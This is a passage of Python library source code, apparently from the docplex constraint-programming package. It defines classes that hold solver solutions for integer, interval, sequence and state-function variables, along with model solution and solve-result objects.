with\n Returns:\n True if this object is equal to the other, False otherwise\n \"\"\"\n return utils.equals(self, other)\n\n\n def __ne__(self, other):\n \"\"\" Overwrite inequality comparison \"\"\"\n return not self.__eq__(other)\n\n\n def __str__(self):\n \"\"\" String representing this object \"\"\"\n return \"{}={}\".format(self.expr.get_name(), self.get_value())\n\n\n def __hash__(self):\n return id(self)\n\n\nclass CpoIntVarSolution(CpoVarSolution):\n \"\"\" This class represents a solution to an integer variable.\n\n The solution can be:\n * *complete* when the value is a single integer,\n * *partial* when the value is a domain, set of multiple values.\n\n A domain is a list of discrete integer values and/or intervals of values represented by a tuple containing\n interval min and max values (included).\n\n For example, following are valid domains for an integer variable:\n * 7 (complete solution)\n * (1, 2, 4, 9)\n * (2, 3, (5, 7), 9, (11, 13))\n \"\"\"\n __slots__ = ('value', # Variable value / domain\n )\n\n def __init__(self, expr, value):\n \"\"\" Constructor:\n\n Args:\n expr: Variable expression, object of class :class:`~docplex.cp.expression.CpoIntVar`.\n value: Variable value, or domain if not completely instantiated\n \"\"\"\n assert isinstance(expr, CpoIntVar), \"Expression 'expr' should be a CpoIntVar expression\"\n super(CpoIntVarSolution, self).__init__(expr)\n self.value = _check_arg_domain(value, 'value')\n\n def get_value(self):\n \"\"\" Gets the value of the variable.\n\n Returns:\n Variable value (integer), or domain (list of integers or intervals)\n \"\"\"\n return self.value\n\n def get_domain_min(self):\n \"\"\" Gets the domain lower bound.\n\n Returns:\n Domain lower bound.\n \"\"\"\n return _domain_min(self.value)\n\n def get_domain_max(self):\n \"\"\" Gets the domain upper bound.\n\n Returns:\n Domain upper bound.\n \"\"\"\n return _domain_max(self.value)\n\n def domain_iterator(self):\n \"\"\" Iterator on the individual values of an integer variable domain.\n\n Returns:\n Value iterator on the domain of this variable.\n \"\"\"\n return _domain_iterator(self.value)\n\n def domain_contains(self, value):\n \"\"\" Check whether a given value is in the domain of the variable\n\n Args:\n val: Value to check\n Returns:\n True if the value is in the domain, False otherwise\n \"\"\"\n return _domain_contains(self.value, value)\n\n\nclass CpoFloatVarSolution(CpoVarSolution):\n # \"\"\" This class represents a solution to a float variable.\n #\n # The solution can be:\n # * *complete* when the value is a single value,\n # * *partial* when the value is an interval.\n # \"\"\"\n __slots__ = ('value', # Variable value or tuple (interval)\n )\n\n def __init__(self, expr, value):\n \"\"\" Constructor:\n\n Args:\n expr: Variable expression, object of class :class:`~docplex.cp.expression.CpoFloatVar`.\n value: Variable value, or domain if not completely instantiated\n \"\"\"\n assert isinstance(expr, CpoFloatVar), \"Expression 'expr' should be a CpoIntVar expression\"\n super(CpoFloatVarSolution, self).__init__(expr)\n self.value = value\n\n def get_value(self):\n \"\"\" Gets the value of the variable.\n\n Returns:\n Variable value (integer), or domain (list of integers or intervals)\n \"\"\"\n return self.value\n\n def get_domain_min(self):\n \"\"\" Gets the domain lower bound.\n\n Returns:\n Domain lower bound.\n \"\"\"\n return self.value if is_number(self.value) else self.value[0]\n\n def get_domain_max(self):\n \"\"\" Gets the domain upper bound.\n\n Returns:\n Domain upper bound.\n \"\"\"\n return self.value if is_number(self.value) else self.value[-1]\n\n def __str__(self):\n \"\"\" Convert this expression into a string \"\"\"\n return str(self.get_name()) + \": \" + str(self.get_value())\n\n\nclass CpoIntervalVarSolution(CpoVarSolution):\n \"\"\" This class represents a solution to an interval variable.\n\n The solution can be complete if all attribute values are integers, or partial if at least one\n of them is an interval expressed as a tuple.\n \"\"\"\n __slots__ = ('start', # Interval start\n 'end', # Interval end\n 'size', # Interval size\n 'length', # Interval length\n 'presence', # Presence indicator\n )\n \n def __init__(self, expr, presence=None, start=None, end=None, size=None, length=None):\n \"\"\" Constructor:\n\n Args:\n expr: Variable expression, object of class :class:`~docplex.cp.expression.CpoIntervalVar`.\n presence: Presence indicator (True for present, False for absent, None for undetermined). Default is None.\n start: Value of start, or tuple representing the start range. Default is None.\n end: Value of end, or tuple representing the end range. Default is None.\n size: Value of size, or tuple representing the size range. Default is None.\n length: Value of the length, or tuple representing the length range. Default is None.\n Not to be used if other values are integers.\n \"\"\"\n assert isinstance(expr, CpoIntervalVar), \"Expression 'expr' should be a CpoIntervalVar expression\"\n super(CpoIntervalVarSolution, self).__init__(expr)\n self.presence = presence\n self.start = start\n self.end = end\n self.size = size\n self.length = length\n\n\n def is_present(self):\n \"\"\" Check if the interval is present.\n\n Returns:\n True if interval is present, False otherwise.\n \"\"\"\n return self.presence is True\n\n\n def is_absent(self):\n \"\"\" Check if the interval is absent.\n\n Returns:\n True if interval is absent, False otherwise.\n \"\"\"\n return self.presence is False\n\n\n def is_optional(self):\n \"\"\" Check if the interval is optional.\n Calling this function returns always False for a complete solution where\n Valid only for a partial solution, meaning that the status of the variable is not yet fixed.\n\n Returns:\n True if interval is optional (undetermined), False otherwise.\n \"\"\"\n return self.presence is None\n\n\n def get_start(self):\n \"\"\" Gets the interval start.\n\n Returns:\n Interval start value, or domain (tuple (min, max)) if not fully instantiated.\n None if interval is absent.\n \"\"\"\n return self.start\n\n\n def get_end(self):\n \"\"\" Gets the interval end.\n\n Returns:\n Interval end value, or domain (tuple (min, max)) if not fully instantiated.\n None if interval is absent.\n \"\"\"\n return self.end\n\n\n def get_size(self):\n \"\"\" Gets the size of the interval.\n\n The size of the interval is the amount of work done in the interval,\n that depends on the intensity function that has been associated to the interval.\n\n Returns:\n Interval size value, or domain (tuple (min, max)) if not fully instantiated.\n None if interval is absent.\n \"\"\"\n return self.size\n\n\n def get_length(self):\n \"\"\" Gets the length of the interval.\n\n Length of the interval is the difference between end and start.\n\n Returns:\n Interval length value, or domain (tuple (min, max)) if not fully instantiated.\n None if interval is absent.\n \"\"\"\n if self.length is None:\n return None if self.end is None else self.end - self.start\n return self.length\n\n\n def get_value(self):\n \"\"\" Gets the interval variable value as a tuple (start, end, size), or () if absent.\n\n If the variable is absent, then the result is an empty tuple.\n\n If the variable is fully instantiated, the result is a tuple of 3 integers (start, end, size).\n The variable length, easy to compute as end - start, can also be retrieved by calling :meth:`get_length`.\n\n If the variable is partially instantiated, the result is a tuple (start, end, size, length) where each\n individual value can be an integer or an interval expressed as a tuple.\n\n Returns:\n Interval variable value as a tuple.\n \"\"\"\n if self.is_present():\n if self.length is None:\n return (self.start, self.end, self.size, )\n else:\n return (self.start, self.end, self.size, self.length, )\n return ()\n\n\n def __str__(self):\n \"\"\" Convert this expression into a string \"\"\"\n res = [str(self.get_name()), ': ']\n if self.is_absent():\n res.append(\"absent\")\n else:\n if self.is_optional():\n res.append(\"optional\")\n res.append(\"(start=\" + str(self.get_start()))\n res.append(\", end=\" + str(self.get_end()))\n res.append(\", size=\" + str(self.get_size()))\n res.append(\", length=\" + str(self.get_length()))\n res.append(\")\")\n return ''.join(res)\n\n \nclass CpoSequenceVarSolution(CpoVarSolution):\n \"\"\" This class represents a solution to a sequence variable.\n \"\"\"\n __slots__ = ('lvars', # List of interval variable solutions\n )\n \n def __init__(self, expr, lvars):\n \"\"\" Constructor:\n\n Args:\n expr: Variable expression, object of class :class:`~docplex.cp.expression.CpoSequenceVar`.\n lvars: Ordered list of interval variable solutions that are in this sequence\n (objects of class :class:`CpoIntervalVarSolution`),\n or list of interval variables (object of class :class:`~docplex.cp.expression.CpoIntervalVar`).\n \"\"\"\n assert isinstance(expr, CpoSequenceVar), \"Expression 'expr' should be a CpoSequenceVar expression\"\n super(CpoSequenceVarSolution, self).__init__(expr)\n self.lvars = lvars\n\n\n def get_interval_variables(self):\n \"\"\" Gets the list of CpoIntervalVarSolution in this sequence.\n\n Returns:\n List of CpoIntervalVarSolution in this sequence.\n \"\"\"\n return self.lvars\n\n\n def get_value(self):\n \"\"\" Gets the list of CpoIntervalVarSolution in this sequence.\n\n Returns:\n List of CpoIntervalVarSolution in this sequence.\n \"\"\"\n return self.lvars\n\n\n def __str__(self):\n \"\"\" Convert this expression into a string \"\"\"\n return str(self.get_name()) + \": (\" + \", \".join([str(v.get_name()) for v in self.lvars]) + \")\"\n\n \nclass CpoStateFunctionSolution(CpoVarSolution):\n \"\"\" This class represents a solution to a step function.\n\n A solution to a step function is represented by a list of steps.\n A step is a triplet (start, end, value) that gives the value of the function on the interval [start, end).\n \"\"\"\n __slots__ = ('steps', # List of function steps\n )\n \n def __init__(self, expr, steps):\n \"\"\" Constructor:\n\n Args:\n expr: Variable expression, object of class :class:`~docplex.cp.expression.CpoStateFunction`.\n steps: List of function steps represented as tuples (start, end, value).\n \"\"\"\n assert isinstance(expr, CpoStateFunction), \"Expression 'expr' should be a CpoStateFunction expression\"\n super(CpoStateFunctionSolution, self).__init__(expr)\n self.steps = steps\n\n\n def get_function_steps(self):\n \"\"\" Gets the list of function steps.\n\n Returns:\n List of function steps. Each step is a tuple (start, end, value).\n \"\"\"\n return self.steps\n\n\n def get_value(self):\n \"\"\" Gets the list of function steps. Identical to `get_function_steps()`.\n\n Returns:\n List of function steps.\n \"\"\"\n return self.steps\n\n\n def __str__(self):\n \"\"\" Convert this expression into a string \"\"\"\n return str(self.get_name()) + \": (\" + \", \".join([str(s) for s in self.steps]) + \")\"\n \n \nclass CpoModelSolution(object):\n \"\"\" This class represents a solution to the problem represented by the model.\n It contains the solutions for the model variables plus the value of the objective(s), if any.\n\n Each variable solution can be accessed using its name, or the variable object of the model.\n The solution is either :class:`CpoIntVarSolution`, :class:`CpoIntervalVarSolution`,\n :class:`CpoSequenceVarSolution` or :class:`CpoStateFunctionSolution` depending on the type of the variable.\n\n A variable solution can be accessed in two ways:\n\n * using the method :meth:`CpoModelSolution.get_var_solution`, that returns an object representing\n the solution to the variable, or None if the variable is not in the solution.\n * using the standard Python expression `sol[]` that does the same but raises a `KeyError` exception\n if the variable is not in the solution.\n\n Depending if the request to solver was a solve or a propagate, the solution can be:\n * *complete*, if each variable is assigned to a single value,\n * *partial* if not all variables are defined, or if some variables are defined with domains that are not\n restricted to a single value.\n\n An instance of this class may also be created explicitly by the programmer of the model to express a *starting point*\n that can be passed to the model to optimize its solve\n (see :meth:`docplex.cp.model.CpoModel.set_starting_point` for details).\n \"\"\"\n __slots__ = ('var_solutions_dict', # Map of variable solutions. Key is expression id or variable name, value depends on variable\n 'var_solutions_list', # List of variable solutions. Value depends on variable\n 'objective_values', # Objective values\n 'objective_bounds', # Objective bound values\n 'objective_gaps', # Objective gap values\n 'kpi_values', # Values of the KPIs\n )\n\n def __init__(self):\n super(CpoModelSolution, self).__init__()\n self.var_solutions_dict = {}\n self.var_solutions_list = []\n self.objective_values = None\n self.objective_bounds = None\n self.objective_gaps = None\n self.kpi_values = OrderedDict()\n\n\n def get_objective_values(self):\n \"\"\" Gets the numeric values of all objectives.\n\n If the solution is partial, each objective value may be an interval expressed as a tuple (min, max)\n\n Returns:\n Array of objective values, None if none.\n \"\"\"\n return self.objective_values\n\n\n def get_objective_bounds(self):\n \"\"\" Gets the numeric values of all objectives bound.\n\n Note that when :meth:`~docplex.cp.modeler.minimize_static_lex` or :meth:`~docplex.cp.modeler.maximize_static_lex` is used,\n the bound values must be taken as a whole, as are the values delivered by :meth:`get_objective_values`.\n One cannot interpret bound values on each criterion independently.\n For example, suppose, we have a problem with two criteria specified to minimize_static_lex,\n a number of workers, and a number of days to complete a job.\n That is, we always prefer to use less workers, but for equal numbers of workers, we prefer to take less days.\n Then a solution with 3 workers and 10 days is perfectly compatible with a lower bound of 2 workers and 13 days,\n even though the lower bound on the number of days is higher than the value in the solution.\n\n Returns:\n Array of all objective bound values, None if none.\n \"\"\"\n return self.objective_bounds\n\n\n def get_objective_gaps(self):\n \"\"\" Gets the numeric values of the gap between objective value and objective bound.\n\n For a single objective, gap is calculated as *gap = abs(value - bound) / max(1e-10, abs(value))*\n\n For multiple objectives, each gap is the gap between corresponding value and bound.\n However, after the first gap whose value is not within optimality tolerance specified by\n :attr:`~docplex.cp.CpoParameters.OptimalityTolerance` and :attr:`~docplex.cp.CpoParameters.RelativeOptimalityTolerance`,\n all returned gap values are positive infinity.\n\n Returns:\n Array of all objective gap values, None if none.\n \"\"\"\n return self.objective_gaps\n\n\n def add_var_solution(self, vsol):\n \"\"\" Add a solution to a variable to this model solution.\n\n Args:\n vsol: Variable solution (object of a class extending :class:`CpoVarSolution`)\n \"\"\"\n assert isinstance(vsol, CpoVarSolution), \"Parameter 'vsol' should be an instance of CpoVarSolution\"\n self.var_solutions_list.append(vsol)\n\n # Add to the dictionary with 2 keys\n var = vsol.expr\n self.var_solutions_dict[id(var)] = vsol\n vname = var.get_name()\n if vname:\n self.var_solutions_dict[vname] = vsol\n\n\n def add_var(self, var, value=None, presence=None, start=None, end=None, size=None):\n \"\"\" Add a solution to a integer or interval variable.\n\n Args:\n var: CPO variable (object of a class extending :class:`~docplex.cp.expression.CpoVariable`)\n value (Optional): Value of the variable if the variable is a integer variable.\n Can be a domain if variable is not completely instantiated.\n presence (Optional): Presence indicator (true for present, false for absent, None for undetermined),\n if the variable is an interval variable.\n start (Optional): Value of start, or tuple representing the start range,\n if the variable is an interval variable.\n end (Optional): Value of end, or tuple representing the end range,\n if the variable is an interval variable.\n size (Optional): Value of size, or tuple representing the size range,\n if the variable is an interval variable.\n \"\"\"\n if isinstance(var, CpoIntVar):\n self.add_var_solution(CpoIntVarSolution(var, value))\n elif isinstance(var, CpoIntervalVar):\n self.add_var_solution(CpoIntervalVarSolution(var, presence, start, end, size))\n else:\n raise AssertionError(\"Argument 'var' should be an instance of CpoIntVar or CpoIntervalVar\")\n\n\n def add_integer_var_solution(self, var, value):\n \"\"\" Add a new integer variable solution.\n\n The solution can be complete if the value is a single integer, or partial if the value\n is a domain, given as a list of integers or intervals expressed as tuples.\n\n Args:\n var: Variable expression, object of class :class:`~docplex.cp.expression.CpoIntVar`.\n value: Variable value, or domain if not completely instantiated\n \"\"\"\n self.add_var_solution(CpoIntVarSolution(var, value))\n\n\n def add_interval_var_solution(self, var, presence=None, start=None, end=None, size=None, length=None):\n \"\"\" Add a new interval variable solution.\n\n The solution can be complete if all attribute values are integers, or partial if at least one\n of them is an interval expressed as a tuple.\n\n Args:\n var: Variable expression, object of class :class:`~docplex.cp.expression.CpoIntervalVar`.\n presence: Presence indicator (true for present, false for absent, None for undetermined). Default is None.\n start: Value of start, or tuple representing the start range\n end: Value of end, or tuple representing the end range\n size: Value of size, or tuple representing the size range\n length: Value of the length, or tuple representing the length range. Default is None.\n Not to be used if other values are integers.\n \"\"\"\n self.add_var_solution(CpoIntervalVarSolution(var, presence, start, end, size, length))\n\n\n def get_var_solution(self, expr):\n \"\"\" Gets a variable solution from this model solution.\n\n Args:\n expr: Variable expression or variable name if any\n Returns:\n Variable solution (class extending :class:`CpoVarSolution`),\n None if variable is not found\n \"\"\"\n return self.var_solutions_dict.get(expr) if is_string(expr) else self.var_solutions_dict.get(id(expr))\n\n\n def get_all_var_solutions(self):\n \"\"\" Gets the list of all variable solutions from this model solution.\n\n Returns:\n List of all variable solutions (class extending :class:`CpoVarSolution`).\n \"\"\"\n return self.var_solutions_list\n\n\n def get_value(self, expr):\n \"\"\" Gets the value of a variable or a KPI.\n\n This method first find the variable with :meth:`get_var_solution` and, if exists,\n returns the result of a call to the method get_value() on this variable.\n\n The result depends on the type of the variable. For details, please consult documentation of methods:\n\n The expression can also be the name of a KPI.\n\n * :meth:`CpoIntVarSolution.get_value`\n * :meth:`CpoIntervalVarSolution.get_value`\n * :meth:`CpoSequenceVarSolution.get_value`\n * :meth:`CpoStateFunctionSolution.get_value`\n\n Note that the builtin method *__getitem__()* is overwritten to call this method.\n Writing *sol.get_value(x)* is then equivalent to write *sol[x]*.\n\n Args:\n expr: Variable expression, variable name or KPI name.\n Returns:\n Variable value, None if variable is not found.\n Raises:\n KeyError if expression is not in the solution.\n \"\"\"\n var = self.get_var_solution(expr)\n if var is not None:\n return var.get_value()\n return self.get_kpi_value(expr)\n\n\n def set_value(self, var, value):\n \"\"\" Sets the value of a variable.\n\n This method allows to set an integer variable or an interval variable with the short representation\n used to represent it, as returned by :meth:`CpoIntVarSolution.get_value`\n or :meth:`CpoIntervalVarSolution.get_value`.\n\n For an integer variable, value can be:\n\n * If the variable is fully instantiated, a single integer.\n * If the variable is partially instantiated, a domain expressed as a list of integers or intervals.\n\n For an interval variable, value can be:\n\n * If the variable is absent, an empty tuple.\n * If the variable is fully instantiated, a tuple of 3 integers (start, end, size).\n * If the variable is partially instantiated, a tuple (start, end, size, length) where each\n individual value can be an integer or an interval expressed as a tuple.\n\n Note that the builtin method *__setitem__()* is overwritten to call this method.\n Writing *sol.set_value(x, y)* is then equivalent to write *sol[x] = y*.\n\n *New in version 2.9.*\n\n Args:\n var: Model variable\n value: short representation of the variable value\n \"\"\"\n if isinstance(var, CpoIntVar):\n self.add_integer_var_solution(var, value)\n elif isinstance(var, CpoIntervalVar):\n if not value:\n self.add_interval_var_solution(var, presence=False)\n elif len(value) == 3:\n start, end, size = value\n self.add_interval_var_solution(var, presence=True, start=start, end=end, size=size)\n elif len(value) == 4:\n start, end, size, length = value\n self.add_interval_var_solution(var, presence=True, start=start, end=end, size=size, length=length)\n else:\n raise AssertionError(\"Invalid value format for an interval variable\")\n else:\n raise AssertionError(\"Variable that can be set directly are restricted to integer and interval variables\")\n\n\n def add_kpi_value(self, name, value):\n \"\"\" Add a KPI value to this solution\n\n Args:\n name: Name of the KPI\n value: Model variable representing this KPI\n \"\"\"\n self.kpi_values[name] = value\n\n\n def get_kpis(self):\n \"\"\" Get the solution KPIs.\n\n Returns:\n Ordered dictionary containing value of the KPIs that have been defined in the model.\n Key is KPI publish name, value is expression value.\n Keys are sorted in the order the KPIs have been defined.\n \"\"\"\n return self.kpi_values\n\n\n def get_kpi_value(self, name):\n \"\"\" Get the value of a KPI\n\n Args:\n name: Name of the KPI\n Returns:\n Value of the KPI\n Raises:\n KeyError if KPI is not in the solution.\n \"\"\"\n return self.kpi_values[name]\n\n\n def is_empty(self):\n \"\"\" Check whether this solution contains any information\n\n Returns:\n True if there is no objective value and no variable\n \"\"\"\n return (self.objective_values is None) and (not self.var_solutions_dict)\n\n\n def map_solution(self, sobj):\n \"\"\" Map a python object on this solution.\n\n This method builds a copy of the source object and replace in its attributes all occurrences of\n model expressions by their value in this solution.\n This method is called recursively on all child objects.\n\n Args:\n sobj: Source object\n Returns:\n Copy of the source object where model expressions are replaced by their values\n \"\"\"\n return replace(sobj, self.get_value)\n\n\n def _add_json_solution(self, jsol, expr_map, model, prms):\n \"\"\" Add a json solution to this solution descriptor\n\n Args:\n jsol: JSON document representing solution.\n expr_map: Map of model expressions. Key is name in JSON document, value is corresponding model expression.\n model: Source model\n prms: Solving parameters\n \"\"\"\n # Add objectives\n ovals = jsol.get('objectives')\n if ovals:\n self.objective_values = tuple([_get_interval(v) for v in ovals])\n\n # Add objectives bounds\n bvals = jsol.get('bounds')\n if bvals:\n self.objective_bounds = tuple([_get_num_value(x) for x in bvals])\n\n # Add objectives gaps\n gvals = jsol.get('gaps')\n if gvals:\n self.objective_gaps = tuple([_get_num_value(x) for x in gvals])\n elif ovals and bvals and not any(is_array(v) for v in ovals):\n # Gaps not given but bounds present. Recompute gaps\n gvals = []\n rt = prms.RelativeOptimalityTolerance\n at = prms.OptimalityTolerance\n intol = True\n for v, b in zip(self.objective_values, self.objective_bounds):\n if intol:\n gap = _compute_gap(v, b)\n intol = _is_below_tolerance(v, b, rt, at)\n else:\n gap = POSITIVE_INFINITY\n gvals.append(gap)\n self.objective_gaps = tuple(gvals)\n else:\n self.objective_gaps = None\n\n # Add integer variables\n vars = jsol.get('intVars', ())\n for vname in vars:\n var = _get_expr_from_map(expr_map, vname)\n self.add_var_solution(CpoIntVarSolution(var, _get_domain(vars[vname])))\n\n # Add integer variables\n vars = jsol.get('floatVars', ())\n for vname in vars:\n var = _get_expr_from_map(expr_map, vname)\n self.add_var_solution(CpoFloatVarSolution(var, _get_domain(vars[vname])))\n\n # Add interval variables\n vars = jsol.get('intervalVars', ())\n for vname in vars:\n var = _get_expr_from_map(expr_map, vname)\n v = vars[vname]\n if 'start' in v:\n # Check partially instantiated\n if 'presence' in v:\n vsol = CpoIntervalVarSolution(var, True if v['presence'] == 1 else None,\n _get_domain(v['start']), _get_domain(v['end']), _get_domain(v['size']))\n vsol.length = _get_domain(v['length'])\n else:\n vsol = CpoIntervalVarSolution(var, True, _get_num_value(v['start']), _get_num_value(v['end']), _get_num_value(v['size']))\n else:\n vsol = CpoIntervalVarSolution(var, False)\n self.add_var_solution(vsol)\n\n # Add sequence variables (MUST be done after single variables)\n vars = jsol.get('sequenceVars', ())\n for vname in vars:\n var = _get_expr_from_map(expr_map, vname)\n vnlist = [v for v in vars[vname]]\n ivres = [self.get_var_solution(vn) for vn in vnlist]\n #ivres = [_get_expr_from_map(expr_map, vn) for vn in vnlist] Should have been this instead of previous line\n self.add_var_solution(CpoSequenceVarSolution(var, ivres))\n\n # Add state functions\n funs = jsol.get('stateFunctions', ())\n for fname in funs:\n fun = _get_expr_from_map(expr_map, fname)\n lpts = [( _get_num_value(v['start']), _get_num_value(v['end']), _get_num_value(v['value'])) for v in funs[fname]]\n self.add_var_solution(CpoStateFunctionSolution(fun, lpts))\n\n # Set kpis\n kpi_values = jsol.get('KPIs', {})\n kpis = model.get_kpis()\n try:\n for name, (expr, loc) in kpis.items():\n if isinstance(expr, types.FunctionType):\n # KPI is a lambda expression\n value = expr(self)\n elif name in kpi_values:\n # KPI is a solver KPI\n value = kpi_values[name]\n else:\n # KPI is a model variable\n value = self.get_value(expr)\n self.add_kpi_value(name, value)\n except:\n # Solution has no values\n pass\n\n\n def __getitem__(self, expr):\n \"\"\" Overloading of [] to get a variable solution from this model solution\n\n Args:\n expr: Variable expression or variable name if any\n Returns:\n Variable solution (class CpoVarSolution)\n \"\"\"\n return self.get_value(expr)\n\n\n def __setitem__(self, var, value):\n \"\"\" Overloading of [] to set a variable solution in this model solution\n\n Args:\n var: Variable expression\n value: Variable value\n Returns:\n Variable solution (class CpoVarSolution)\n \"\"\"\n return self.set_value(var, value)\n\n\n def __contains__(self, expr):\n \"\"\" Overloading of 'in' to check that a variable solution is in this model solution\n\n Args:\n expr: Variable expression or variable name if any\n Returns:\n True if this model solution contains a solution for this variable.\n \"\"\"\n return self.get_var_solution(expr) is not None\n\n\n def print_solution(self, out=None):\n \"\"\" Prints the solution on a given output.\n\n If the given output is a string, it is considered as a file name that is opened by this method\n using 'utf-8' encoding.\n\n DEPRECATED. Use :meth:`write` instead.\n\n Args:\n out: Target output stream or output file, standard output if not given.\n \"\"\"\n self.write(out)\n\n\n def write(self, out=None):\n \"\"\" Write the solution.\n\n If the given output is a string, it is considered as a file name that is opened by this method\n using 'utf-8' encoding.\n\n Args:\n out (Optional): Target output stream or file name. If not given, default value is sys.stdout.\n \"\"\"\n # Check file\n if is_string(out):\n with open_utf8(os.path.abspath(out), mode='w') as f:\n self.write(f)\n return\n # Check default output\n if out is None:\n out = sys.stdout\n\n # Print objective value, bounds and gaps\n ovals = self.get_objective_values()\n if ovals:\n out.write(u\"Objective values: {}\".format(ovals))\n bvals = self.get_objective_bounds()\n if bvals:\n if ovals:\n out.write(u\", bounds: {}\".format(bvals))\n else:\n out.write(u\"Bounds: {}\".format(bvals))\n gvals = self.get_objective_gaps()\n if gvals:\n out.write(u\", gaps: {}\".format(gvals))\n out.write(u\"\\n\")\n\n # Print all variables in natural name order\n lvars = [v for v in self.get_all_var_solutions() if v.get_name()]\n lvars = sorted(lvars, key=functools.cmp_to_key(lambda v1, v2: compare_expressions(v1.expr, v2.expr)))\n for v in lvars:\n out.write(str(v))\n out.write(u'\\n')\n\n # Print all KPIs in declaration order\n kpis = self.get_kpis()\n for k in kpis.keys():\n out.write(u'{}: {}\\n'.format(k, kpis[k]))\n\n\n def __str__(self):\n \"\"\" Build a short string representation of this object.\n Returns:\n String representation of this object.\n \"\"\"\n return \"(objs: {}, bnds: {}, gaps: {}\".format(self.get_objective_values(), self.get_objective_bounds(), self.get_objective_gaps())\n\n\n def __eq__(self, other):\n \"\"\" Overwrite equality comparison\n\n Args:\n other: Other object to compare with\n Returns:\n True if this object is equal to the other, False otherwise\n \"\"\"\n return utils.equals(self, other)\n\n\n def __ne__(self, other):\n \"\"\" Overwrite inequality comparison \"\"\"\n return not self.__eq__(other)\n\n\nclass CpoRunResult(object):\n \"\"\" This class is an abstract class extended by classes representing the result of a call to the solver.\n\n It contains the following elements:\n * model that has been solved,\n * solver parameters,\n * solver information,\n * solver output log, if configuration has been set to store it (default).\n \"\"\"\n def __init__(self, model):\n super(CpoRunResult, self).__init__()\n self.model = model # Source model\n self.solver_log = None # Solver log\n self.process_infos = CpoProcessInfos() # Process information\n self.parameters = CpoParameters() # Solving parameters\n self.solver_infos = CpoSolverInfos() # Solving information\n\n\n def get_model(self):\n \"\"\" Gets the source model\n\n Returns:\n Source model, object of class :class:`~docplex.cp.model.CpoModel`\n \"\"\"\n return self.model\n\n\n def _set_solver_log(self, log):\n \"\"\" Set the solver log as a string.\n\n Args:\n log (str): Log of the solver\n \"\"\"\n self.solver_log = log\n\n\n def get_solver_log(self):\n \"\"\" Gets the log of the solver.\n\n Returns:\n Solver log as a string, None if unknown.\n \"\"\"\n return self.solver_log\n\n\n def get_process_infos(self):\n \"\"\" Gets the set of informations provided by the Python API concerning the solving of the model.\n\n Returns:\n Object of class :class:`CpoProcessInfos` that contains general information on model processing.\n \"\"\"\n return self.process_infos\n\n\n def get_process_info(self, name, default=None):\n \"\"\" Get a particular process information.\n\n Args:\n name: Name of the process info to get\n default: (optional) Default value if not found. None by default.\n Returns:\n Value of the process info, default value if not found.\n \"\"\"\n if self.process_infos is None:\n return default\n return self.process_infos.get(name, default)\n\n\n def get_parameters(self):\n \"\"\" Gets the complete dictionary of solving parameters.\n\n Returns:\n Solving parameters, object of class :class:`~docplex.cp.parameters.CpoParameters`.\n \"\"\"\n return self.parameters\n\n\n def get_parameter(self, name, default=None):\n \"\"\" Get a particular solving parameter.\n\n Args:\n name: Name of the parameter to get\n default: (optional) Default value if not found. None by default.\n Returns:\n Parameter value, default value if not found.\n \"\"\"\n if self.parameters is None:\n return default\n return self.parameters.get(name, default)\n\n\n def get_infos(self):\n \"\"\" Gets the complete dictionary of solver information attributes.\n\n Deprecated. use :meth:`get_solver_infos` instead.\n\n Returns:\n Solver information, object of class :class:`CpoSolverInfos`.\n \"\"\"\n return self.solver_infos\n\n\n def get_solver_infos(self):\n \"\"\" Gets the set of information provided by the solver concerning to the solving of the model.\n\n Returns:\n Solver information, object of class :class:`CpoSolverInfos`.\n \"\"\"\n return self.solver_infos\n\n\n def get_info(self, name, default=None):\n \"\"\" Gets a particular solver information attribute.\n\n Deprecated. use :meth:`get_solver_info` instead.\n\n Args:\n name: Name of the information to get\n default: (optional) Default value if not found. None by default.\n Returns:\n Information attribute value, None if not found.\n \"\"\"\n return self.solver_infos.get(name, default)\n\n\n def get_solver_info(self, name, default=None):\n \"\"\" Gets a particular solver information attribute.\n\n Args:\n name: Name of the information to get\n default: (optional) Default value if not found. None by default.\n Returns:\n Information attribute value, None if not found.\n \"\"\"\n return self.solver_infos.get(name, default)\n\n\n def _set_json_doc(self, jdoc):\n \"\"\" Set the JSON document used to build this result.\n\n Args:\n jdoc: JSON object\n \"\"\"\n # Add json format version in process infos\n jver = jdoc.get('cpSerializationFormatVersion')\n if jver is not None:\n self.process_infos['JsonFormatVersion'] = jver\n\n # Add parameters\n prms = jdoc.get('parameters', None)\n if prms is not None:\n self.parameters.update(prms)\n\n # Add information attributes\n cpinf = jdoc.get('cpInfo', None)\n if cpinf is not None:\n self.solver_infos.update(cpinf)\n\n\n def _is_json_format_version(self, xver):\n \"\"\" Check whether the source JSON format version is greater or equal to the argument.\n\n Args:\n xver: Expected json format version\n Returns:\n True if json format version is defined and greater or equal to the required value\n \"\"\"\n jver = self.process_infos.get('JsonFormatVersion')\n return (jver is not None) and (jver >= xver)\n\n\n def __str__(self):\n \"\"\" Convert this object into representative string.\n Returns:\n String representing this object\n \"\"\"\n return \"(model: {}, log: {})\".format(self.model.get_name(), \"yes\" if self.solver_log else \"no\")\n\n\nclass CpoSolveResult(CpoRunResult):\n \"\"\" This class represents the result of a call to the solve of a model.\n\n On top of those already stored in :class:`CpoRunResult`, it contains the following elements:\n * solve status,\n * output log\n * solution, if any, object of class :class:`CpoModelSolution`.\n\n If this result contains a solution, the methods implemented in the class :class:`CpoModelSolution`\n to access solution elements are available directly from this class.\n \"\"\"\n def __init__(self, model):\n \"\"\" Constructor:\n\n Args:\n model: Related model\n \"\"\"\n super(CpoSolveResult, self).__init__(model)\n self.solve_status = SOLVE_STATUS_UNKNOWN # Solve status, with value in SOLVE_STATUS_*\n self.fail_status = FAIL_STATUS_UNKNOWN # Fail status, with values in FAIL_STATUS_*\n self.search_status = None # Search status, with value in SEARCH_STATUS_*\n self.stop_cause = None # Stop cause, with values in STOP_CAUSE_*\n self.solveTime = 0 # Solve time\n self.is_a_solution = False # Solution indicator\n self.solution = CpoModelSolution() # Solution\n\n self.process_infos[CpoProcessInfos.MODEL_BUILD_TIME] = model.get_modeling_duration()\n\n\n def _set_solve_status(self, ssts):\n \"\"\" Set the solve status\n\n Args:\n ssts: Solve status\n \"\"\"\n self.solve_status = ssts\n\n\n def get_solve_status(self):\n \"\"\" Gets the solve status.\n\n Returns:\n Solve status, element of the global list :const:`ALL_SOLVE_STATUSES`.\n \"\"\"\n return self.solve_status\n\n\n def get_fail_status(self):\n \"\"\" Gets the solving fail status.\n\n This method is deprecated since release 12.8.\n Use :meth:`~CpoSolveResult.get_search_status` and :meth:`~CpoSolveResult.get_stop_cause` instead.\n\n Returns:\n Fail status, element of the global list :const:`ALL_FAIL_STATUSES`.\n \"\"\"\n return self.fail_status\n\n\n def 